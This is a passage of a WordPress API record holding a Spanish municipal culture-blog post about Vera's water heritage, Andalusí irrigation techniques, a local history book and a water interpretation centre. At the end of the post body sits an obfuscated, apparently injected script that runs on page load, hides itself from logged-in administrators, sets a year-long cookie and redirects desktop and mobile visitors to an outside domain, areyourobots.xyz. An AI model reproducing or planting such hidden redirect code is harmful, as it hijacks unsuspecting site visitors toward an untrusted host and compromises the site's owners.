distribuci\u00f3n interna de la ciudad y, particularmente, en la ubicaci\u00f3n de algunos de sus establecimientos m\u00e1s importantes, como mezquitas y ba\u00f1os.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Rodezno-de-molino-de-agua.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2083\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Rodezno-de-molino-de-agua-300x235.jpg\" alt=\"Rodezno de molino de agua\" width=\"300\" height=\"235\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Rodezno-de-molino-de-agua-300x235.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Rodezno-de-molino-de-agua.jpg 940w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Rodezno de molino de agua<\/b><\/i><\/span><\/span><\/p>\n<p>Pero resuelto el problema del suministro, queda el de la evacuaci\u00f3n de las aguas residuales y de las pluviales.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Canalizaci\u00f3n-de-alcantarillado.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2064\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Canalizaci\u00f3n-de-alcantarillado-202x300.jpg\" alt=\"Canalizaci\u00f3n de alcantarillado\" width=\"202\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Canalizaci\u00f3n-de-alcantarillado-202x300.jpg 202w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Canalizaci\u00f3n-de-alcantarillado.jpg 272w\" sizes=\"(max-width: 202px) 100vw, 202px\" \/><\/a><\/p>\n<p align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Canalizaci\u00f3n de alcantarillado<\/b><\/i><\/span><\/span><\/p>\n<p>Los musulmanes perfeccionaron inmensamente las t\u00e9cnicas de riego, se convirtieron en los maestros de la t\u00e9cnica hidr\u00e1ulica agr\u00edcola, aprovecharon los sistemas de riego romanos que se encontraron, y junto a las t\u00e9cnicas orientales que conoc\u00edan, pudieron lograr un excepcional aprovechamiento del agua, no se puede pasar del hecho del contenido etimol\u00f3gico \u00e1rabe de las palabras actuales con las que se designan las obras hidr\u00e1ulicas o de riego.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/canalizacion-de-canat.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2065\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/canalizacion-de-canat.jpg\" alt=\"canalizacion de canat\" width=\"250\" height=\"270\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Canalizaci\u00f3n de qanat<\/b><\/i><\/span><\/span><\/p>\n<p>El agua tambi\u00e9n jug\u00f3 un papel importante en la revoluci\u00f3n industrial, ya que \u00e9sta nunca pudo haber sido de no ser por los motores a vapor. Como tambi\u00e9n los motores a vapor que permitieron la revoluci\u00f3n industrial, y fue gracias a ella. A veces, no pensamos de la importancia de este preciado, importante y vital l\u00edquido. La desperdiciamos y la tiramos, en algunos casos, casi por placer. Contaminamos m\u00e1s y m\u00e1s el agua cada d\u00eda, destruyendo la vida que hay en ella, infectamos los r\u00edos, lagos y mares y pareciese que no nos hace falta.<\/p>\n<p><b>EL AGUA EN VERA UN PATRIMONIO HIST\u00d3RICO <\/b><\/p>\n<p class=\"western\"><b>S<\/b>in entrar en una evocaci\u00f3n de los conceptos de su ciclo a trav\u00e9s de la Historia, el agua ha aparecido siempre como amiga del hombre y su enemiga a la vez, una fuente de poder, una manzana de la discordia, un patrimonio y una v\u00edctima.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Las-tierras-de-Vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2077\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Las-tierras-de-Vera-300x208.jpg\" alt=\"Las tierras de Vera\" width=\"300\" height=\"208\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Las-tierras-de-Vera-300x208.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Las-tierras-de-Vera-1024x709.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Las-tierras-de-Vera.jpg 1041w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\" align=\"center\"><span style=\"color: #3366ff\"><span style=\"font-size: small\"><i><b>Las tierras de Vera<\/b><\/i><\/span><\/span><\/p>\n<p class=\"western\">En Vera, a lo largo de su Historia, el agua ha sido una necesidad crucial para la supervivencia y motivo de luchas en una zona concreta, en un momento determinado de la historia de una localidad, reflejado en un trabajo de investigaci\u00f3n etnohist\u00f3rica realizado en los a\u00f1os noventa del siglo XX y plasmado en el libro \u2018<i><b>Vera, agua y suelo.<\/b><\/i> <i><b>La historia de la lucha por el agua en a ciudad del levante almeriense<\/b><\/i>\u201d<sup><a class=\"sdfootnoteanc\" href=\"#sdfootnote1sym\" name=\"sdfootnote1anc\"><sup>1<\/sup><\/a><\/sup> con objetivo mostrar un conjunto de situaciones en la historia de unas gentes, en su mundo, describiendo las relaciones del hombre y el agua en su diversidad para as\u00ed hacer percibir riquezas.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/libro-el-agua-en-vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2086\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/libro-el-agua-en-vera-300x221.jpg\" alt=\"libro el agua en vera\" width=\"300\" height=\"221\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/libro-el-agua-en-vera-300x221.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/libro-el-agua-en-vera.jpg 567w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\">El control del agua ha provocado a lo largo de los siglos innumerables batallas. Y todav\u00eda hoy, el l\u00edquido elemento es una de las muchas claves de los conflictos sociales que atravesamos.<\/p>\n<p class=\"western\">Este libro analiza la peque\u00f1a y gran historia detr\u00e1s de la lucha por el agua en Vera. A trav\u00e9s del recorrido hist\u00f3rico del agua podremos conocer los hitos m\u00e1s importantes para la historia de la poblaci\u00f3n, tanto en la ejecuci\u00f3n de proyectos en relaci\u00f3n con el abastecimiento de agua a la ciudad como de los regad\u00edos. Con destacadas obras p\u00fablicas, proyectadas a veces por algunos de los m\u00e1s destacados t\u00e9cnicos de la \u00e9poca, el rico patrimonio hidr\u00e1ulico veratense adquiere plena carta de naturaleza desde la Edad Media.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galeria-fuente-cuatro-ca\u00f1os.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2075\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galeria-fuente-cuatro-ca\u00f1os-137x300.jpg\" alt=\"Galeria fuente cuatro ca\u00f1os\" width=\"137\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galeria-fuente-cuatro-ca\u00f1os-137x300.jpg 137w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galeria-fuente-cuatro-ca\u00f1os-469x1024.jpg 469w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Galeria-fuente-cuatro-ca\u00f1os.jpg 473w\" sizes=\"(max-width: 137px) 100vw, 137px\" \/><\/a><\/p>\n<p class=\"western\"><b>D<\/b>urante varios a\u00f1os de investigaci\u00f3n, se han consultado los archivos hist\u00f3ricos municipales de Vera, el provincial de Almer\u00eda y otros fuera de nuestra provincia como el Nacional. Los importantes datos obtenidos se han completado con un arduo trabajo de campo, realizado en el medio rural y urbano del municipio. Ello ha permitido inventariar, catalogar y documentar un amplio patrimonio hidr\u00e1ulico, en su mayor parte abandonado, y actualmente destruido por los desmesurables desmontes provocados por el acaparamiento de terrenos de monte para nuevos cultivos, sin control administrativo, que desvela el ingenio y tes\u00f3n que sus habitantes desarrollaron a lo largo de la Historia.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/proyecto-fuente-algarrobo.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2082\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/proyecto-fuente-algarrobo-300x257.jpg\" alt=\"proyecto fuente algarrobo\" width=\"300\" height=\"257\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/proyecto-fuente-algarrobo-300x257.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/proyecto-fuente-algarrobo.jpg 611w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\">El libro, ampliamente ilustrado con planos de antiguos proyectos de Fuentes y fotos o dibujos de ca\u00f1os, lavaderos, abrevaderos, aljibes, conducciones de regad\u00edo, sus acueductos y embalses, norias, pozos, fuentes p\u00fablicas ornamentales, etc., desvela muchas de as claves hist\u00f3ricas de Vera y su entorno en los \u00faltimos cinco siglos de su Historia.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-monumental-plaza-mayor.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2073\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-monumental-plaza-mayor-190x300.jpg\" alt=\"fuente monumental plaza mayor\" width=\"190\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-monumental-plaza-mayor-190x300.jpg 190w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/fuente-monumental-plaza-mayor.jpg 477w\" sizes=\"(max-width: 190px) 100vw, 190px\" \/><\/a><\/p>\n<p class=\"western\">La Historia del agua es la Historia de la Humanidad. Todos sabemos de la importancia del agua a lo largo de la Historia y la lucha y contaminaci\u00f3n de la que ha sido objeto en los \u00faltimos siglos. El agua ha sido testigo de nuestra historia.<\/p>\n<p class=\"western\">Nuestro derecho al agua a lo largo de la Historia est\u00e1 tan sometido al de la propiedad que todo alrededor de ella ha sido una lucha constante de poder. Y, alrededor de este preciado l\u00edquido se ha desarrollado culturas y civilizaciones que, como \u201ccombustible esencial que impulsa la vida\u201d, lleg\u00f3 a desarrollar una ciencia y una tecnolog\u00eda espec\u00edfica para su control y aprovechamiento.<\/p>\n<p class=\"western\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/plan-vera-hidr\u00e1ulica.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2080\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/plan-vera-hidr\u00e1ulica-300x193.jpg\" alt=\"plan vera hidr\u00e1ulica\" width=\"300\" height=\"193\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/plan-vera-hidr\u00e1ulica-300x193.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/plan-vera-hidr\u00e1ulica-1024x659.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/plan-vera-hidr\u00e1ulica.jpg 1066w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p class=\"western\">Y en este territorio de Vera y su amplia jurisdicci\u00f3n del pasado hist\u00f3rico esta lucha tambi\u00e9n qued\u00f3 bien manifiesta en documentos jur\u00eddicos y notariales, en la econom\u00eda y en la pol\u00edtica, etc. Conflictos y controversias que a\u00fan perviven hoy, agravados por su escasez y contaminaci\u00f3n\u2026 Es una Historia de la posesi\u00f3n, administraci\u00f3n y uso del agua para riego y abastecimiento urbano con un perenne componente de escasez t\u00edpica de esta zona mediterr\u00e1nea.<\/p>\n<p class=\"western\">Y todas aquellas personal que quieran saber de este desarrollo hist\u00f3rico en la comarca, lo encontrar\u00e1 en este libro \u201c<i>Vera, Agua y Suelo. Historia de la lucha por el agua en una ciudad del Levante almeriense<\/i>\u201d, que es un viaje por la historia del agua en este territorio, donde narramos c\u00f3mo la lucha por el agua dulce ha forjado nuestra sociedad de manera extraordinaria. Y sigue siendo el agua centro de tensiones sociales que sacuden encuentros y desencuentros pol\u00edticos y sociales.<\/p>\n<h1 class=\"western\"><span style=\"color: #0000ff\"><span style=\"font-size: medium\"><i>EL CENTRO DE INTERPRETACI\u00d3N DE LA CULTURA DEL AGUA (CICA)<\/i><\/span><\/span><\/h1>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CICA.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2067\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CICA-250x300.jpg\" alt=\"CICA\" width=\"250\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CICA-250x300.jpg 250w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/CICA.jpg 277w\" sizes=\"(max-width: 250px) 100vw, 250px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2088\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os1-216x300.jpg\" alt=\"Copia de triptico cuatro ca\u00f1os1\" width=\"216\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os1-216x300.jpg 216w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os1.jpg 567w\" sizes=\"(max-width: 216px) 100vw, 216px\" \/><\/a><\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2089\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os-214x300.jpg\" alt=\"Copia de triptico cuatro ca\u00f1os\" width=\"214\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os-214x300.jpg 214w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2016\/04\/Copia-de-triptico-cuatro-ca\u00f1os.jpg 567w\" sizes=\"(max-width: 214px) 100vw, 214px\" \/><\/a><\/p>\n<div id=\"sdfootnote1\">\n<p class=\"sdfootnote-western\"><a class=\"sdfootnotesym\" href=\"#sdfootnote1anc\" name=\"sdfootnote1sym\">1<\/a> Ortiz Soler, D. y Cara Barrionuevo, L.: <span style=\"font-family: Comic Sans MS,cursive\"><i>Vera, agua y suelo. La historia de la lucha por el agua en a ciudad del levante almeriense. Ayuntamiento de Vera,2003<\/i><\/span><\/p>\n<\/div>\n<p><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>EXPOSICI\u00d3N D\u00cdA MUNDIAL DEL AGUA<\/p>\n","protected":false},"author":7,"featured_media":2068,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2057","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-museo"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=2057"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2057\/revisions"}],"predecessor-version":[{"id":2100,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/2057\/revisions\/2100"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/2068"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=2057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=2057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=2057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}